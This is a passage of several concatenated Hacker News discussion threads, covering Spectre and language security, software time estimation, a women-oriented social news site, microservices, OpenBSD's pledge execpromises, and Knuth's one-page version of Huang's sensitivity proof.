I think concluding the "end of langsec" goes too far. We'll continue to need
both langsec, plus much more thorough hardware verification to re-establish
basic isolation assumptions lost with Spectre/Meltdown (or push for detailed
HW specs to begin with, to be able to assert these assumptions on our own).
OTOH, as if it wasn't obvious enough already, I'm seeing a serious issue with
the concept of executing arbitrary code from untrusted network locations, such
as with JavaScript on the Web.
------
juancn
The failure lies in forgetting that computers are not deterministic machines,
they are probabilistically deterministic machines instead.
They are physical constructs, not mathematical ones, and as such, verification
is inescapable if you want some level of assurance. You need tolerances and
experimentation after construction, even if you proved your thing correct.
In the words of Knuth: "Beware of bugs in the above code; I have only proved
it correct, not tried it."
------
crb002
The major chip manufacturers need to have two kinds of cores/caches. One that
has full security guarantees, the other that is optimized for energy
efficiency/performance and has zero interprocess security. This isn't a one
size fits all problem.
~~~
zzzcpan
I see some people assume that a possibility of a single chip that can do both
is not option. It is. It's only x86 that has to do everything in hardware and
hide everything from the user for backwards compatibility.
Imagine instructing a compiler for an architecture that does everything in
software, like Mill, to make every operation constant time or to speculate
aggressively and unsafely depending on what the program needs.
------
KaiserPro
Even on the Arduino I don't think I could claim that I knew 100% what was
going on, let alone go/python/JS -> kernel -> docker/VM -> -> kernel ->
processor
------
fnord77
meh.
reasoning always loses out to empirical techniques anyway.
------
jezfromfuture
Buy a new cpu that is fixed and problem gone maybe we shouldn’t change the
world maybe intel should fix there own problem? If a car has a serious fault
that makes it dangerous it’s recalled it’s time for intel to do the same.
| {
"pile_set_name": "HackerNews"
} |
How can you estimate time for something you've never done before? - rbsn
How can you estimate time for something you've never done before? It could be a feature you've never written before or one which you are not sure is even possible?
======
aidos
It's a complicated business. More than anything I'm very honest about the
uncertainty these days. I also try to give ranges for things - instead of
saying it will take about 2 days (which cements a specific deadline), say, 2 -
4 days.
As you get older (more experienced) you become less concerned with
overestimation. When you're young and ambitious you think that a) you can do
it faster than you really can and b) it's bad to say it'll take 2 days when
really you _think_ you can do it in 1. a) you can't and b) people don't
normally question your overestimates.
Also, try to think things through. Ask questions. Discover those subtle
missing requirements that haven't been communicated yet. Try to picture how it
will fit into the system and imagine why that might go wrong. If it's a bigger
feature break it into parts and (over)estimate each of those.
Be _thoughtful_ , _overestimate_ and be _honest_ (especially with yourself).
------
daven11
I use a very simple version of function point analysis. Write down all the
different things you know you need to do, beside each one write easy, medium
or hard. easy takes 0.5 to 1 day, medium 2-3 days, hard 3-5 days. If you think
any bits are very hard then break it down - if you can't then you've found
something you don't know - and you have to focus on that - this is a risk and
flag it as such.
If it's a big project then chop it up into deliverables, so you can monitor
your estimates along the way.
..there's a lot more but something to get you started.
(if you have to deliver on your estimate - double it :-). When you double your
estimate - make sure you don't work to your doubled estimates - otherwise
you'll have to double it again :-) )
------
EnderMB
I work at an agency using ASP.NET, so I find myself regularly estimating for
projects and small jobs. The biggest issue with our clients is that they will
always argue how long things will take. One of our large clients has a SEO guy
in one of their offices that has "11 years web experience" (despite not
programming professionally for the best part of three years, and seemingly
knowing very little about programming or how the Internet works) and he will
frequently argue every small cost. We quoted two hours to modify a form used
across eleven country-specific sites for one specific use case on a single
site, and he went crazy, stating that it'd take him "twenty seconds in PHP". A
bit of Googling shows that this guy hacks a bit of PHP in his spare time, but
can't code for shit, and given his position at the company it's not really up
to him to dictate price.
Anyway, the only way to give a valid estimate is to break down the task as
much as you possibly can and to assign risk to each small task. Build a
spreadsheet and break down every task into the smallest possible unit, and
assign a risk rating to it. Any tasks that are high risk should be estimated
as a range, rather than a fixed time. Even with this advice you'll still get
things wrong, but it's impossible not to. It's the nature of estimating.
The best advice I can give you is to stick to your guns and estimate for how
long it will take YOU to do a task. If people still argue, then tough. As
rightly pointed out by adios, more experienced devs/pm's will happily
overestimate and will fight their corner to say that this is how long a task
takes. If you are honest with yourself on how long a task will take then you
will find it much easier to stick to your guns when someone complaints that
"an easy task" shouldn't take as long as you've said.
------
shanelja
_Over_ estimate.
Yesterday I was asked to integrate Sendgrid with our analytics server over
cURL in a cronjob.
Not only had I never used Sendgrid before or even seen the codebase for our
analytics server, I've never used cURL Multi before - so I was walking in
knowing nothing.
I said it would take me "about 2 days", which seemed "fair" to my manager, in
the end it only took me about 5 hours, so they were happy to get it early and
I had all the debug time I needed.
~~~
rbsn
I try to overestimate, but then I worry that I may be seen as wasting time or
being grossly inefficient. Obviously there is a balance. This is something I
worry about much.
~~~
arxanas
If you get work done before the due date, how could it be seen as inefficient?
~~~
rbsn
My problem is that if I say it would take me 2 weeks and my colleague says he
can do it in just one - though I am overestimating, he will most likely seem a
better, more efficient employee.
~~~
kohanz
If they consistently estimate less effort than you do AND they consistently
delivers on those estimates, then they ARE more efficient. However, you will
find in most cases that the people who give lower estimates, tend to miss
deadlines more often too.
------
sharemywin
Break it into smaller pieces that you can estimate. Is there something that is
similar? You can always say let me research a little bit to get you answer. In
engineering/technology it better to under commit and over deliver. In business
it's better to over commit and work your ass off.
------
pagade
Remember and remind - Hofstadter's Law: It always takes longer than you
expect, even when you take into account Hofstadter's Law.[1]
[1] <http://en.wikipedia.org/wiki/Hofstadter%27s_law>
------
VikingCoder
Remember the first rule of data:
Never gather it, until you know how it's going to be used.
Who is asking you to estimate, and what are they going to do with those
numbers?
Until you explore and understand the answers to those kinds of questions, it's
irresponsible to try to satisfy the request.
If you like the answers you get, then give the best data you can. If the
answers you get suck, then you need to try to change how people are behaving.
If you can't, then maybe you need a new job.
| {
"pile_set_name": "HackerNews"
} |
5 Reasons Why I Want Digg for Girls - estherschindler
http://www.heartlessdoll.com/2008/10/5_reasons_why_i_want_digg_for_girls.php
======
pavel_lishin
I'm a guy, and I couldn't care less about the NBA, Howard Stern, or James Bond
trivia without spraining something.
What exactly IS "girl stuff"? The article didn't mention a single example of
what a "girl link" is, except jokingly mentioning a few sexist ideas.
~~~
jsdalton
I'll give you my opinion here: It's not so much about the content, as it is
about the community that evolved around the content.
For me, Hacker News is a great example of this. Why do we need Hacker News
when we've already got Proggit (i.e. the Programming sub-Reddit)? Truthfully,
Reddit's social news technology is more advanced than HN, and there's a lot
more people and stories there. Right?
As you'll probably agree...no, not exactly. What sets HN apart (for now) is
that it's smaller, more serious, and arguably more intelligent than Reddit's.
I see the same links posted here as I do on Reddit; the key difference is the
conversations that ensue and in particular the tone of those discussions.
This is long-winded way of saying "girl stuff" isn't about having gossip and
fashion articles, but more about a culture evolving around those stories. I do
think that the male-dominated culture surrounding sites like Digg, Reddit, and
even HN can be off-putting to women.
~~~
Frabjous-Dey
I think you hit the nail on the head. Social news sites are only worthwhile
insofar as your interests and participation align with the interests and
participation of your peers on the site.
The author is really saying two things:
\- "I'm not interested in the articles that make the front page of Digg": a
terrific reason not to use Digg.
\- "If women had a Digg of their own, the articles on it would be much more
relevant to me." Probably somewhat true. But I know plenty of female geeks who
wouldn't give a shit about anything on weheartgossip or kirtsy.
The real goal here is to find a quality community that appeals to you.
Unfortunately, this is not all that easy: not only are most people morons, you
need a lot of people to be active in the same place for a social website to be
worth visiting.
~~~
jsdalton
I do think getting the communities to form is a challenge, and I think the
challenge is even more difficult amongst non-nerd demographics.
I actually set up a slinkset site, <http://www.bababase.com>, a few months ago
based on the very premise we're discussing, but I've had a tough time finding
a way to get traction amongst a non-nerd crowd! (Moms, in this case.)
~~~
dgabriel
Moms are _incredibly_ active on the web. All you need to do is get in with the
"Mommy Blogger" crowd, which is quite large and influential, and tends towards
activism.
iVillage is filled with moms, as are wahm message boards, etc., etc. Your
audience is there, and they want what you've got, I'm sure.
~~~
jsdalton
You're totally right, and I appreciate the encouragement actually.
I'm really not the world's most phenomenal marketer or community organizer. It
takes a lot of those two competencies to be successful in a social application
endeavor. :/
------
dgabriel
Hmm. As a girl, I _am_ interested in stuff like the following. My issues have
never been with links, but with idiotic commentary on links.
_Instead, I'm stuck reading headlines like "Compressed Air Cars Coming To New
Zealand" and "New maskless lithography trick may keep Moore's Law on track."_
~~~
DaniFong
Digg commentary is at times, physically painful for me to read. Like someone
punched me in the gut. What stupidity and ignorance. What a cesspool.
What is it about certain internet places that make people so awful? Anonymity?
Or are there people actually that bad all around me, in real life, and I
simply don't notice?
~~~
dgabriel
I don't think these people really believe what they're saying, but it's very
easy to let the Id take over when your name and reputation aren't on the line.
All these young boys want to be the class clown, without the unfortunate
ramifications, and Digg is the perfect outlet.
I think this is why HN tends to be more civil and worthwhile -- you have
active editors, and most people use their real names as their usernames or in
their bios.
ps - her crack about compressed air cars must have really hurt...
~~~
DaniFong
Yeah, it did. "Screw the environment. Those things are only interesting
because of internet Male's bizarre fascination with them. Instead, let me
write about whether Barack Obama is anorexic?! That's what _real_ girls want
to hear about..."
Not going to let it keep me down, though. We just sent out a bunch of letters
to investors. Low and behold, we now have a pitch.
~~~
cgranade
Just who are these mythical girls that are only interesting in such tripe,
anyway? I've never met one...
~~~
DaniFong
I don't know many either. My theory is that the interests of many were formed
and set in cliques in high school, which I wasn't around to see. The few
people I know now who are interested in such things _also_ enjoy science and
technology and art.
You know the phrase 'six degrees of separation?' I feel like it must be at
least three or four. I have little to no contact with these people, even
though they're all around me. I felt similarly when I went to a baseball game,
once. Wow.
~~~
cgranade
I never went to high school, so I never really grokked that kind of clique
behavior. I mean, cliques can be good as they help us organize vast social
networks, but I've been told they go way overboard in that environment.
Even though I have never been to a sports game (excepting a Harlem
Globetrotters show, but that wasn't really a game), I kind of feel the same
way walking around my hometown of Fairbanks. The population is small enough
that I likely have no more than two or three degrees between myself and any
random stranger. It's a very odd feeling, and one that I've never gotten used
to.
------
Alex3917
I don't know how Slashdot did it, but "insightful / informative / interesting
/ funny" seem to be exactly the four qualities that can make a piece of text
good. If you either added a bucket or took a bucket away, the signal to noise
ratio would go down. At least from my perspective. But maybe women have
different buckets, or have a different optimal blend of how much should fall
into each bucket.
edit: My proposed mechanism for this is that the pattern matching in women's
brains is less strict than the pattern matching in men's brains (i.e. women
see patterns more easily), which for women blurs the line between interesting
and insightful. But I don't actually have any credible evidence to support
this, so take it for what it's worth.
~~~
mseebach
Successful niche forums/boards have a social contract that the participants
enforce on each other. The fact that you on HN need x1 points to vote comments
down, and x2>>x1 points to kill stories (and on Slashdot, the karma-system),
ensures that new members are accepted into the contract by peers based on
contribution.
In older times, boards had moderators, and admins picked out active members as
mods based on their performance.
But this model is susceptible to group-think, especially when a topic falls
outside the contract. It just happened here during the presidential election
that apparently the body of users are sufficiently politically diverse, that
intelligent, respectful debate prevailed over mindless up-voting of anything
adhering to one specific mindset. It could very well have went in the other
direction. It's absolutely no guarantee that you because someone make
insightful tech/startup comments, that he also is going to vote down a stupid
comment, even if it's in favor of his political POV.
Solving this problem; making sure that a community like HN can stay
intelligent, and not be diluted as it gains popularity, I think, is a very big
opportunity.
~~~
estherschindler
I, for one, miss the social contract. But then I was a CompuServe sysop by
1990, and ran several types of online discussion groups (including
ZDNet/AT&T's InterChange, which nobody else remembers). There was incredible
value in the people who owned a stake in the forum's success (particularly
anything vendor- or company-related) in choosing moderators who knew how to
create a balance between being <a
href="[http://advice.cio.com/esther_schindler/6_stupid_mistakes_com...](http://advice.cio.com/esther_schindler/6_stupid_mistakes_companies_make_with_their_online_communities)">both
barkeep and bouncer</a>\--not the least of which was a sincere welcome to the
community.
Even when I haven't been involved in running an online community, I've always
been a participant in several of them. And yes, some women need to feel "safe"
before they will come out of lurkerMode. (Obviously I am not in that set, but
I expect the woman who wrote the blog post to which I linked does count
herself among them.) For instance, I'm a member of two women-in-IT tech groups
(a general one and one specifically for web designers/developers, and believe
me, you can't shut them up). The whole notion of women-in-IT and its
reflection in online communities isn't going to go away just because some guys
(and some women, too) say, "But really, you don't need a separate space."
(As you can probably tell, this is a topic very close to my heart.)
------
0xdefec8
Forget girls; Digg ostracizes anyone who isn't a Male-Liberal-American-
ObamaSupporting-AppleLoving-WebDesigner.
~~~
ryanwaggoner
They make an exception for Ron Paul fanatics, oddly enough.
~~~
Dilpil
The Ron Paul fanatics make an exception for themselves.
------
ATB
Reddit had a spin-off called lipstick.com, which has now become
<http://www.weheartgossip.com/>
There's the 'OMG' reddit alien, replete with blond hair and lipstick:
[http://thumbs.reddit.com/t5_2qh3n_29.png?v=4v4n810ku3an8yqud...](http://thumbs.reddit.com/t5_2qh3n_29.png?v=4v4n810ku3an8yqud5egg2hzlsckf9jp0ztw)
Sadly, it falls into the category of 'what advertisers/editors think women
want in a social networking site.' Based on my own at-work experience with
somewhat/fairly geeky girls (not coders), tmz.com and perezhilton.com already
accomplish what lipstick/weheartgossip seek to do.
------
zearles
There IS a digg for girls: PrettySocial ;-)
<http://www.prettysocial.net/>
Seriously though, there are several such sites with different target groups:
PrettySocial (ours): for young women, focus is on fashion, beauty, health etc.
with lots of pretty pictures!
Kirtsy: for mothers and older women, coverage is more general
Boudica: it's a new site, the stories are a little random, but looks promising
------
ObieJazz
_...the site has a core userbase of boys who spend hours each day posting
stories and Digging stories posted by their friends._
The problem here is that a small core group of users is able to exert undue
influence on the site. If the ranking system on Digg were better balanced, its
featured stories would better represent the interests of its broader (and
presumably more gender-balanced) user base.
------
helveticaman
You can take the source code for hacker news, change the css around, and buy a
fitting domain name.
------
josefresco
Top Headlines from Digg right now:
Oregon Woman Loses $400,000 to Nigerian E-Mail Scam First Look at Johnny Depp-
Mad Hatter in Alice in Wonderland New honeycomb tire is 'bulletproof' If TV
Shows Had Truthful Titles Phil Gramm Has No Remorse Over Destroying the US
Economy Chinese pirates crack Blu-ray DRM, sell pirated HD discs Top 10
Unfortunate Political One-Liners 30 Rare & Expensive Gamecube Games New MythTV
Interface Preview Mark Cuban charged with insider trading.
Anyone see a male bias there? The Johnny Depp article would actually tip the
scales to the female side in my opinion.
~~~
ATB
Sure, I'll bite.
\- "Oregon Woman Loses 400k to scam" \-- Although it's a story about a woman,
I suspect that the vast majority of the 552 current comments are from men,
making rude, arrogant, or demeaning comments. Men braying like jackasses and
cracking puerile jokes about how dumb someone (a woman) is? What's not to
love?
\- "First Look at Johnny Depp" \-- Skews female
\- "New honeycomb tire is 'bulletproof'" \-- A story about car/bike technology
and guns/bullets. Not to feed any stereotypes here, fellas, but that
positively reeks of testosterone.
\- "If TV Shows Had Truthful Titles" \-- Sophomoric snark on the Internet
_can_ amuse both sexes, but tends to skew male. Perhaps because sophomoric
snark in general skews male. No offense intended.
\- "Top 10 Unfortunate Political One-Liners" \-- Obsessing over political
minutiae/sophomoric snark again, combined with a bit of political trivia? See
above. Or do you think that the relentless Ron Paul stories were also being
constantly up-voted by an enraptured female audience glued to whatever new
tidbit was coming from his camp?
\- "Phil Gramm Has No Remorse Over Destroying the US Economy" \-- See above.
This is a story that could be appealing to both men and women, but the puerile
slant to it makes it slightly less interesting to women, or so I've tended to
notice. Just like in Real Life, your hilarious political jokes just AREN'T
THAT FUNNY to most girls, y'know?
\- "Chinese pirates crack Blu-ray DRM, sell pirated HD discs" \-- DRM nerd
porn. There's no reason why this wouldn't appeal to women, but by and large,
the tone and thrust of the article greatly narrows its (male) audience.
\- "30 Rare & Expensive Gamecube Games" \-- Skews both older and to a more
rarefied hardcore/distinguishing gamer audience. Which is largely male. If it
said 'best Wii games' for instance, it wouldn't be so male-centric.
\- "New MythTV Interface Preview" \-- Nerd porn. See above.
\- "Mark Cuban charged with insider trading." \-- Nerd-slash-financial-slash-
sports porn.
Cue the inevitable comments how you're a woman and those stories _totally_
appeal to you. :-)
~~~
modoc
so... what do you think women who want to use a digg-esque website ARE into?
Most women I know are far more into snarky commentary/comedy than I am, and
are very interested in politics, the economy, and way more into tv than I am,
etc...
------
cabalamat
There's a web app (forget what it's called) that analyses the writing on a web
page and decides whether a man or woman wrote it.
So something like this could be largely automated, start off with a collection
of links then categorise them according to the text on the page and/or the
writing of the person linking to them.
~~~
Alex3917
<http://bookblog.net/gender/genie.php>
It doesn't work well enough for what you're proposing though. The accuracy
(according to their blog) is roughly 50%, which is no better than chance.
------
geuis
There aren't even 5 points in the article. Just the same complaint "I don't
like Digg content" 5 times. She gives examples of what she doesn't like, but
at no point offers examples of the kinds of things she likes. Also, I'm
honestly not sure if the core group of women who would power a site like digg
would be very different than the guys on digg. There's roughly only 1% of digg
users submitting content. Would the 1% of women submit Martha Stewart or Steve
Jobs? I suspect the difference between the über geek girl isn't to far from
über geek guy.
------
sil3ntmac
<http://kirsty.com> (used to be called something else, I forget). They talked
about that site when I took a tour of the Houston Technology Center.
------
Dilpil
Of COURSE there is a digg for girls. In fact, of course there are 5. It's
disheartening to realize how much has already been completely done to death.
------
blurry
There _is_ Digg for girls:
boudica.com
~~~
josefresco
Two 'Random' Headlines from Boudica:
Jennifer Lopez wants another baby The other side of Angelina Jolie
Granted those were 'cherry picked' to make my point, but this Girl-Digg site
seems like the same stuff you'd see inside the popular glossy and rather
crappy women's magazines that are sold in supermarkets and bookstores
nationwide. All that's missing are the "10 Signs Your Husband is Cheating" and
"47 Ways to Lose Weight Fast" articles.
~~~
blurry
I agree Jose, Boudica community seems to cater to the lowest common
denominator. I posted the link not because I like it but because it is
precisely what the poster asked, a Digg for girls.
------
cglee
Here's another: <http://www.kirtsy.com/>
------
mannylee1
Try www.lipstick.com.
------
DanielBMarkham
There are a few -- try <http://www.kirtsy.com/>
------
feverishaaron
kirtsy.com
| {
"pile_set_name": "HackerNews"
} |
Microservices – Not A Free Lunch - patrickxb
http://highscalability.com/blog/2014/4/8/microservices-not-a-free-lunch.html
======
lowbloodsugar
"Where a monolithic application might have been deployed to a small
application server cluster, you now have tens of separate services to build,
test, deploy and run, potentially in polyglot languages and environments."
My experience is that it is vastly harder to keep a single application server
running that involved only _two_ teams compared to two teams each with three
or four microservices that they own.
"Keeping an application server running can be a full time job, but we now have
to ensure that tens or even hundreds of processes stay up, don't run out of
disk space, don't deadlock, stay performant. It's a daunting task."
No, see, keeping up a giant monolithic application server running is a full
time job.
Author seems to entirely miss the point of microservices. The problems of
giant application servers don't multiply when you break it into microservices.
They go away.
"Developers with a strong DevOps profile like this are hard to find, so your
hiring challenge just became an order of magnitude more difficult if you go
down this path."
High Performance Teams are High Performance Teams. If you don't have one, your
giant monolithic application is also doomed to failure. You just get to
pretend that all the bugs will come out in QA.
------
phamilton
Aminator + Asgaard + Simian Army (along with other open source offerings from
Netflix) can get you a lot of the Lunch for Free.
That said, you need to know how to use them and invest significant time and
effort in getting it up and running.
[http://netflix.github.io/#repo](http://netflix.github.io/#repo)
| {
"pile_set_name": "HackerNews"
} |
Wordle - Beautiful Word Clouds - raghus
http://www.wordle.net/
======
nreece
An old one.
Here's a Wordle for PG's essays:
[http://www.wordle.net/gallery/wrdl/34828/Paul_Graham's_Essay...](http://www.wordle.net/gallery/wrdl/34828/Paul_Graham's_Essays)
------
jaxn
I used wordle to create a bio of sorts for my Twitter background
<http://twitter.com/jaxn>
| {
"pile_set_name": "HackerNews"
} |
OpenBSD pledge(2) “execpromises” - notaplumber
https://marc.info/?l=openbsd-cvs&m=151304116010721&w=2
======
notaplumber
pledge(2): [https://man.openbsd.org/pledge](https://man.openbsd.org/pledge)
"pledge()'s 2nd argument becomes char *execpromises, which becomes the pledge
for a new execve image immediately upon start."
This will be eventually be used to improve fork+exec daemons, permitting a
much safer interlock between parent and child.
Previous mailing list discussions: [https://marc.info/?l=openbsd-
tech&m=151302727506669&w=2](https://marc.info/?l=openbsd-
tech&m=151302727506669&w=2)
[https://marc.info/?l=openbsd-
tech&m=151268831628549&w=2](https://marc.info/?l=openbsd-
tech&m=151268831628549&w=2)
| {
"pile_set_name": "HackerNews"
} |
Knuth on Huang's Sensitivity Proof: “I've got the proof down to one page” [pdf] - espeed
https://www.scottaaronson.com/blog/?p=4229#comment-1815290
======
svat
A few random comments:
• Obviously, this is typeset with TeX.
• Though originally Knuth created TeX for books rather than single-page
articles, he's most familiar with this tool so it's unsurprising that he'd use
it to just type something out. (I remember reading somewhere that Joel
Spolsky, who was PM on Excel, used Excel for everything.)
• To create the PDF, where most modern TeX users might just use pdftex, he
seems to first created a DVI file with tex (see the PDF's title “huang.dvi”),
then gone via dvips (version 5.98, from 2009) to convert to PostScript, then
(perhaps on another computer?) “Acrobat Distiller 19.0 (Macintosh)” to go from
PS to PDF.
• If you find it different from the “typical” paper typeset with LaTeX,
remember that Knuth doesn't use LaTeX; this is typeset in plain TeX. :-)
Unlike LaTeX which aims to be a “document preparation system” with
“logical”/“structured” (“semantic”) markup rather than visual formatting, for
Knuth TeX is just a tool; typically he works with pencil and paper and uses a
computer/TeX only for the final typesetting, where all he needs is to control
the formatting.
• Despite being typeset with TeX which is supposed to produce beautiful
results, the document may appear very poor on your computer screen (at least
it did when I first viewed it on a Linux desktop; on a Mac laptop with Retina
display it looks much better though somewhat “light”). But if you zoom in
quite a bit, or print it, it looks great. The reason is that Knuth uses bitmap
(raster) fonts, not vector fonts like the rest of the world. Once bitten by
“advances” in font technology (his original motivation to create TeX &
METAFONT), he now prefers to use bitmap fonts and completely specify the
appearance (when printed/viewed on a sufficiently high-resolution device
anyway), rather than use vector fonts where the precise rasterization is up to
the PDF viewer.
• An extension of the same point: everything in his workflow is optimized for
print, not onscreen rendering. For instance, the PDF title is left as
“huang.dvi” (because no one can look at it when printed), the characters are
not copyable, etc. (All these problems are fixable with TeX too these days.)
• Note what Knuth has done here: he's taken a published paper, understood it
well, thought hard about it, and come up with (what he feels is) the “best”
way to present this result. This has been his primary activity all his life,
with _The Art of Computer Programming_ , etc. Every page of TAOCP is full of
results from the research literature that Knuth has often understood better
than even the original authors, and presented in a great and uniform style —
those who say TAOCP is hard to read or boring(!) just have to compare against
the original papers to understand Knuth's achievement. He's basically
“digested” the entire literature, passed it through his personal
interestingness filter, and presented it an engaging style with enthusiasm to
explain and share.
> when Knuth won the Kyoto Prize after TAOCP Volume 3, there was a faculty
> reception at Stanford. McCarthy congratulated Knuth and said, "You must have
> read 500 papers before writing it." Knuth answered, "Actually, it was
> 5,000." Ever since, I look at TAOCP and consider that each page is the witty
> and insightful synthesis of ten scholarly papers, with added Knuth insights
> and inventions.
([https://blog.computationalcomplexity.org/2011/10/john-
mccart...](https://blog.computationalcomplexity.org/2011/10/john-
mccarthy-1927-2011.html?showComment=1319546990817#c6154784930906980717))
• I remember a lunchtime conversation with some colleagues at work a few years
ago, where the topic of the Turing Award came up. Someone mentioned that Knuth
won the Turing Award for writing (3 volumes of) TAOCP, and the other person
did not find it plausible, and said something like “The Turing Award is not
given for writing textbooks; it's given for doing important research...” — but
in fact Knuth did receive the award for writing TAOCP; writing and summarizing
other people's work is his way of doing research, advancing the field by
unifying many disparate ideas and extending them. When he invented the Knuth-
Morris-Pratt algorithm in his mind he was “merely” applying Cook's theorem on
automata to a special case, when he invented LR parsing he was “merely”
summarizing various approaches he had collected for writing his book on
compilers, etc. Even his recent volumes/fascicles of TAOCP are breaking new
ground (e.g. currently simply trying to write about Dancing Links as well as
he can, he's coming up with applying it to min-cost exact covers, etc.
Sorry for long comment, got carried away :-)
~~~
svat
Looks like no one complained about the long comment, so some further trivia I
omitted mentioning:
• The problem that one cannot copy text from a PDF created via dvips and using
METAFONT-generated bitmap fonts has recently been fixed — the original author
of dvips, Tomas Rokicki ([1], [2]) has “come out of retirement” (as far as
this program is concerned anyway) to fix this and is giving a talk about it
next week at the TeX Users Group conference ([3], [4]):
> Admittedly this is a rare path these days; most people are using pdfTeX or
> using Type 1 fonts with dvips, but at least one prominent user continues to
> use bitmap fonts.
So in the future (when/if Knuth upgrades!) his PDFs too will be searchable.
:-)
• In some sense, even Knuth's work on TeX and METAFONT can be seen as an
extension of his drive to understand and explain (in his own unique way)
others' work: at one point, suddenly having to worry about the appearance of
his books, he took the time to learn intensively about typesetting and font
design, then experiment and encode whatever he had learned into programs of
production quality (given constraints of the time). This is in keeping with
his philosophy: “Science is what we understand well enough to explain to a
computer. Art is everything else we do.” and (paraphrasing from a few mentions
like [5] and [6]) “The best way to understand something is to teach it _to a
computer_ ”.
• Finally returning (somewhat) to the topic, and looking at the 2/3rds-page
proof that Knuth posted [7], one may ask, is it really any “better”, or
“simpler”, than Huang's original proof [8]? After all, Huang's proof is
already very short: just about a page and a half, for a major open problem for
30 years; see the recent Quanta article ([9], HN discussion [10]). And by
using Cauchy’s Interlace Theorem, graph terminology, and eigenvalues, it puts
the theorem in context and (to researchers in the field) a “natural” setting,
compared to Knuth's proof that cuts through all that and keeps only the
unavoidable bare essentials. This is a valid objection; my response to that
would be: different readers are different, and there are surely some readers
to whom a proof that does not even involve eigenvalues is really more
accessible. A personal story: in grad school I “learned” the simplex algorithm
for linear programming. Actually I never quite learned it, and couldn't answer
basic questions about it. Then more recently I discovered Knuth's “literate
program” implementing and explaining the simplex algorithm [11], and that one
I understood much better.
> The famous simplex procedure is subtle yet not difficult to fathom, even
> when we are careful to avoid infinite loops. But I always tend to forget the
> details a short time after seeing them explained in a book. Therefore I will
> try here to present the algorithm in my own favorite way—which tends to be
> algebraic and combinatoric rather than geometric—in hopes that the ideas
> will then be forever memorable, at least in my own mind.
I can relate: although the simplex algorithm has an elegant geometrical
interpretation about what happens when it does pivoting etc., and this is the
way one “ought” to think about it, somehow I am more comfortable with symbol-
pushing, having an underdeveloped intuition for geometry and better intuition
for computational processes (algorithms). Reading Knuth's exposition, which
may seem pointless to someone more comfortable with the geometrical
presentation, “clicked” for me in a way nothing had before.
This is one reason I am so fascinated by the work of Don Knuth: though I
cannot hope to compare myself in either ability (even his exploits as a
college kid are legendary [12]) or productivity or taste, I _can_ relate to
some of his aesthetic preferences such as for certain areas/styles of
mathematics/programming over others, and being able to so well “relate” to
someone this way gives you hope that maybe by adopting some of the same habits
that worked for them (e.g.: somewhere, Knuth mentions that tries to start
every day by doing whichever thing he's been dreading the most), you'll be
able to move a few steps in somewhat the same direction, and if nothing else,
this puts me in mind of what Bhavabhuti said many centuries ago [13] about
finding someone with the same spirit, so to speak.
[1]: [https://tomas.rokicki.com](https://tomas.rokicki.com) [2]:
[https://www.maa.org/sites/default/files/pdf/upload_library/2...](https://www.maa.org/sites/default/files/pdf/upload_library/2/Joyner-
CMJ-2015.pdf) [3]: [http://tug.org/tug2019/preprints/rokicki-
pdfbitmap.pdf](http://tug.org/tug2019/preprints/rokicki-pdfbitmap.pdf) [4]:
[https://github.com/rokicki/type3search/blob/a70b5f3/README.m...](https://github.com/rokicki/type3search/blob/a70b5f3/README.md#introduction)
[5]:
[https://www.maa.org/sites/default/files/pdf/upload_library/2...](https://www.maa.org/sites/default/files/pdf/upload_library/22/Ford/DonaldKnuth.pdf#page=5)
[6]:
[https://youtu.be/eDs4mRPJonU?t=1514](https://youtu.be/eDs4mRPJonU?t=1514)
(25:14 to 26:46) [7]:
[https://www.cs.stanford.edu/~knuth/papers/huang.pdf](https://www.cs.stanford.edu/~knuth/papers/huang.pdf)
[8]:
[http://www.mathcs.emory.edu/~hhuan30/papers/sensitivity_1.pd...](http://www.mathcs.emory.edu/~hhuan30/papers/sensitivity_1.pdf)
[9]: [https://www.quantamagazine.org/mathematician-solves-
computer...](https://www.quantamagazine.org/mathematician-solves-computer-
science-conjecture-in-two-pages-20190725/) [10]:
[https://news.ycombinator.com/item?id=20531987](https://news.ycombinator.com/item?id=20531987)
[11]: [https://github.com/shreevatsa/knuth-literate-
programs/blob/9...](https://github.com/shreevatsa/knuth-literate-
programs/blob/9b46afe/programs/lp.pdf) [12]: [http://ed-thelen.org/comp-
hist/B5000-AlgolRWaychoff.html#7](http://ed-thelen.org/comp-
hist/B5000-AlgolRWaychoff.html#7) [13]:
[https://shreevatsa.wordpress.com/2015/06/16/bhavabhuti-on-
fi...](https://shreevatsa.wordpress.com/2015/06/16/bhavabhuti-on-finding-a-
reader/)
~~~
vanderZwan
> The problem that one cannot copy text from a PDF created via dvips and using
> METAFONT-generated bitmap fonts has recently been fixed — the original
> author of dvips, Tomas Rokicki ([1], [2]) has “come out of retirement” (as
> far as this program is concerned anyway) to fix this and is giving a talk
> about it next week at the TeX Users Group conference ([3], [4])
Hope that will be filmed and put online, sounds like an intriguing talk to
watch!
~~~
svat
Unfortunately the talks at TUG were not recorded this year, but you can read
the preprint ([http://tug.org/tug2019/preprints/rokicki-
pdfbitmap.pdf](http://tug.org/tug2019/preprints/rokicki-pdfbitmap.pdf)) which
will probably be published in the next issue of TUGboat.
------
cromwellian
I met Knuth a few months ago helping my wife do portrait photography of him (I
got to hold lighting/reflectors :) ), and got to chat with him on machine
learning and other research computer science results. I was floored at the
sheer amount of papers and author names he could recall on the fly, he had
already read every citation I had. At his age, his mind is as sharp as a tack,
and watching him code and demo some stuff to me, he was incredibly adept in
his programming environment, far more productive than I would be. I really
hope he can finish all of the volumes of his books, it will truly be a gift to
humanity.
~~~
svat
Thanks for sharing. That was great to hear, and like you I too hope for many
more volumes coming out.
Your comment reminded me of the following from Herbert Wilf, 2002:
[https://www.math.upenn.edu/~wilf/website/dek.pdf](https://www.math.upenn.edu/~wilf/website/dek.pdf)
(which I believe even better after reading your comment):
_Here’s a little story of math at 35,000 feet. […] I wrote to Don and sent
him a few more related results that Neil and I had gotten […]. As a result, I
got a letter from him that I found to very moving indeed. Of course it was in
his familiar pencilled scrawl, written at the bottom of the note that I had
sent him. It began as follows:_
> > _Dear Herb, I am writing this on an airplane while flying to Austin to
> celebrate Dijkstra’s 70th birthday. This whole subject is beautiful and
> still ripe for research (after more than 150 years of progress!), so I will
> tell you what I know about it (or can recall while on a plane) in hopes that
> it will be useful._
> _There followed four pages of tightly handwritten information that was a
> gold mine of the history of the sequence b(n) and related matters. It
> contained references to de Rham, Dijkstra, Carlitz, Neil Sloane, Stern (of
> Stern-Brocot trees fame), Eisenstein, Conway, Zagier, Schönhage, Hardy,
> Ramanujan, and so forth. It did not merely mention the names. It contained
> precise statements of the results of interest, of their relationship with
> the result of Calkin and myself and with each other. It contained a number
